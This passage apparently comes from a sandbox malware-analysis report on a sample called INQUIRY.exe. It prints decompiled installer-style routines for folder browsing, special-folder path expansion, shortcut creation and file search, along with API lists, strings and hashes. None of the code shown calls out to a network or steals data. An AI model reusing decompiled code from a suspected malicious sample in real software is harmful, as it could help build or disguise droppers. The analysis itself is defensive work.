								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x5233c1
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t124 =  *0x423eb0; // 0x51d818
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}

0x0040427b
0x00404282
0x0040428e
0x0040429c
0x004042a4
0x004042a8
0x004042ae
0x004042ae
0x004042ba
0x0040432e
0x00404335
0x0040440a
0x00404411
0x00404420
0x00404420
0x00404424
0x0040442a
0x00404437
0x00404439
0x00404439
0x00404447
0x0040444c
0x0040444f
0x00404456
0x00404459
0x00404490
0x00404492
0x00404498
0x0040449f
0x004044a1
0x004044a1
0x004044bd
0x004044f9
0x00000000
0x004044bf
0x004044c2
0x004044d6
0x004044d8
0x00000000
0x004044d8
0x0040445b
0x0040445f
0x0040448e
0x0040448e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404461
0x00404461
0x0040446e
0x00404473
0x00000000
0x00000000
0x00404477
0x00404479
0x00404479
0x00404484
0x00404487
0x0040448c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040448c
0x004044e7
0x004044ee
0x004044f5
0x004044fc
0x004044fc
0x00404501
0x00404503
0x0040450b
0x00404511
0x00404511
0x00404518
0x00404521
0x0040452b
0x00404533
0x00404549
0x00404535
0x00404539
0x00404539
0x00404533
0x0040454e
0x00404553
0x00404558
0x00404561
0x00404561
0x0040456a
0x0040456c
0x0040456c
0x00404578
0x00404580
0x0040458a
0x0040458a
0x0040458f
0x00000000
0x0040458f
0x00404459
0x00404413
0x0040441a
0x00000000
0x00000000
0x00000000
0x0040441a
0x0040433b
0x00404341
0x0040435b
0x00404360
0x0040436a
0x00404371
0x00404380
0x00404383
0x00404386
0x0040438d
0x00404395
0x00404398
0x0040439c
0x004043a3
0x004043ab
0x00404403
0x004043ad
0x004043ae
0x004043b5
0x004043ba
0x004043bf
0x004043c7
0x004043d4
0x004043e8
0x004043ec
0x004043ec
0x004043e8
0x004043f1
0x004043fc
0x004043fc
0x004043ab
0x00000000
0x00404360
0x0040434e
0x00000000
0x00000000
0x00404354
0x00000000
0x004042bc
0x004042bc
0x004042c8
0x004042d2
0x004042df
0x004042df
0x004042e5
0x004042ee
0x004042f7
0x004042fa
0x004042fd
0x00404305
0x00404308
0x0040430b
0x00404313
0x0040431a
0x00404321
0x00404595
0x004045a7
0x004045a7
0x0040432c
0x00000000
0x0040432c

APIs

GetDlgItem.USER32 ref: 004042C1
SetWindowTextA.USER32(?,?), ref: 004042EE
SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
CoTaskMemFree.OLE32(00000000), ref: 004043AE
lstrcmpiA.KERNEL32(xzfdi,00420498,00000000,?,?), ref: 004043E0
lstrcatA.KERNEL32(?,xzfdi), ref: 004043EC
SetDlgItemTextA.USER32 ref: 004043FC

Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
SetDlgItemTextA.USER32 ref: 00404549

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004043C9
xzfdi, xrefs: 004043DA, 004043DF, 004043EA
A, xrefs: 0040439C

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$xzfdi
API String ID: 2246997448-3803636507
Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59

Uniqueness

Uniqueness Score: -1.00%

Function 00405AA7 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42367c; // 0x5233c1
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x423ed8; // 0x521d84
				_t73 = _t72 + _t36;
				_t37 = 0x422e40;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x424000;
							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
						} else {
							E004059E3(_t84,  *0x423ea8);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405CE3(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x423ea4; // 0x73951340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405AA7(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405A85(_a4, _t37);
			}

0x00405aa7
0x00405aa7
0x00405aa7
0x00405aad
0x00405ab2
0x00405ab4
0x00405ac3
0x00405ac3
0x00405ac5
0x00405ace
0x00405ad0
0x00405ad5
0x00405ad8
0x00405ad9
0x00405ae0
0x00405ae2
0x00405ae8
0x00405aeb
0x00405aeb
0x00405cc0
0x00405cc0
0x00405cc4
0x00000000
0x00000000
0x00405af8
0x00405afe
0x00000000
0x00000000
0x00405b04
0x00405b05
0x00405b08
0x00405b0b
0x00405cb3
0x00405cbd
0x00405cbf
0x00405cbf
0x00405cb5
0x00405cb7
0x00405cb9
0x00405cba
0x00405cba
0x00000000
0x00405cb3
0x00405b11
0x00405b15
0x00405b1a
0x00405b29
0x00405b2c
0x00405b2e
0x00405b33
0x00405b36
0x00405b39
0x00405b3c
0x00405b3f
0x00405b42
0x00405c5d
0x00405c60
0x00405c90
0x00405c93
0x00405c98
0x00405c9c
0x00405c9c
0x00405ca1
0x00405ca2
0x00405ca7
0x00405caa
0x00405cac
0x00000000
0x00405cac
0x00405c62
0x00405c65
0x00405c7a
0x00405c81
0x00405c67
0x00405c6e
0x00405c6e
0x00405c89
0x00405c8c
0x00405c55
0x00405c56
0x00405c56
0x00000000
0x00405c8c
0x00405b4a
0x00405b4b
0x00405b51
0x00405b53
0x00405b6d
0x00405b6d
0x00405b74
0x00405b74
0x00405b7b
0x00405b7f
0x00405b7f
0x00405b80
0x00405b82
0x00405bbb
0x00405bbe
0x00405bce
0x00405bd1
0x00405bd9
0x00405bdf
0x00405bdf
0x00405c3b
0x00405c3b
0x00405c3d
0x00000000
0x00000000
0x00405be3
0x00405bea
0x00405beb
0x00405bed
0x00405c07
0x00405c15
0x00405c1b
0x00405c1d
0x00405c38
0x00405c38
0x00405c38
0x00000000
0x00405c38
0x00405c23
0x00405c2e
0x00405c34
0x00405c36
0x00000000
0x00000000
0x00000000
0x00405c36
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405c01
0x00405c03
0x00405c05
0x00000000
0x00000000
0x00000000
0x00405c05
0x00000000
0x00405c3b
0x00405bc6
0x00000000
0x00405b84
0x00405b89
0x00405b9f
0x00405ba4
0x00405ba7
0x00405c44
0x00405c44
0x00405c48
0x00405c50
0x00405c50
0x00000000
0x00405c48
0x00405bb1
0x00405c3f
0x00405c3f
0x00405c42
0x00000000
0x00000000
0x00000000
0x00405c42
0x00405b82
0x00405b55
0x00405b59
0x00000000
0x00000000
0x00405b5b
0x00405b5f
0x00000000
0x00000000
0x00405b61
0x00405b65
0x00000000
0x00405b67
0x00405b67
0x00000000
0x00405b67
0x00405b65
0x00405cca
0x00405cd4
0x00405ce0
0x00405ce0
0x00000000

APIs

GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
GetSystemDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BC6
GetWindowsDirectoryA.KERNEL32(xzfdi,00000400), ref: 00405BD9
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
SHGetPathFromIDListA.SHELL32(00000000,xzfdi), ref: 00405C23
CoTaskMemFree.OLE32(00000000), ref: 00405C2E
lstrcatA.KERNEL32(xzfdi,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
lstrlenA.KERNEL32(xzfdi,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2

Strings

xzfdi, xrefs: 00405AD0, 00405B93, 00405BB0, 00405BC5, 00405BD8, 00405BF4, 00405C1F, 00405C4F, 00405C55, 00405C6D, 00405C80, 00405C9B, 00405CA1, 00405CAC, 00405CD6
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405C4A
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B95

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$xzfdi
API String ID: 900638850-1289049640
Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402012 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E004055E5(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x0040201b
0x00402025
0x0040202e
0x00402038
0x00402041
0x0040204b
0x0040204f
0x0040204f
0x00402054
0x00402065
0x0040206d
0x0040214d
0x0040214d
0x00402154
0x00402073
0x00402073
0x00402084
0x00402088
0x0040208e
0x00402098
0x0040209a
0x004020a5
0x004020a8
0x004020b5
0x004020b7
0x004020b9
0x004020c0
0x004020c3
0x004020c3
0x004020c6
0x004020d0
0x004020d8
0x004020dd
0x004020e9
0x004020e9
0x004020ec
0x004020f5
0x004020f8
0x00402101
0x00402106
0x00402118
0x00402127
0x00402129
0x00402135
0x00402135
0x00402127
0x00402137
0x0040213d
0x0040213d
0x00402140
0x00402146
0x0040214b
0x00402160
0x00000000
0x00000000
0x00000000
0x0040214b
0x00402156
0x00402880
0x0040288c

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040209D

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402630 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E004059E3(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405A85();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402648
0x0040265c
0x00402667
0x00402668
0x004027a3
0x0040264a
0x0040264a
0x0040264c
0x0040264e
0x0040264e
0x00402880
0x0040288c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A

Uniqueness

Uniqueness Score: -1.00%

Function 021A0B88 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9343edb79864026b3d50e65115d794073cb4cf1aed3092053309e1c1d36ce6
Instruction ID: c6204df5a1538db9627ffe0020e3f6d58d2ec67b46903b88f61a889bff28e361
Opcode Fuzzy Hash: eb9343edb79864026b3d50e65115d794073cb4cf1aed3092053309e1c1d36ce6
Instruction Fuzzy Hash: 9FE1F254C5D2E9ADDB06CBF945643FCBFB05D2A102F0845CAE0E5E6283C53A934EDB25

Uniqueness

Uniqueness Score: -1.00%

Function 021A0616 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: ce5107af4373d84ad1ec0dd0d75e915d0a40e693e57723f6d455b4a1e9d74ae4
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: 4E11E975A00114AFCB20DFADC8989AEF7FDEF89698B554065F809D3314E774DE40C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 021A0706 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: 4bb4f0fbc797876815e24c5772a70c14e7ed46739587e967e6b2a6def793cc95
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: F6E012397A45459FC754CBA8C951E65B3F4EB1D360B154294F815C73A1EB34ED00DA50

Uniqueness

Uniqueness Score: -1.00%

Function 021A0744 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
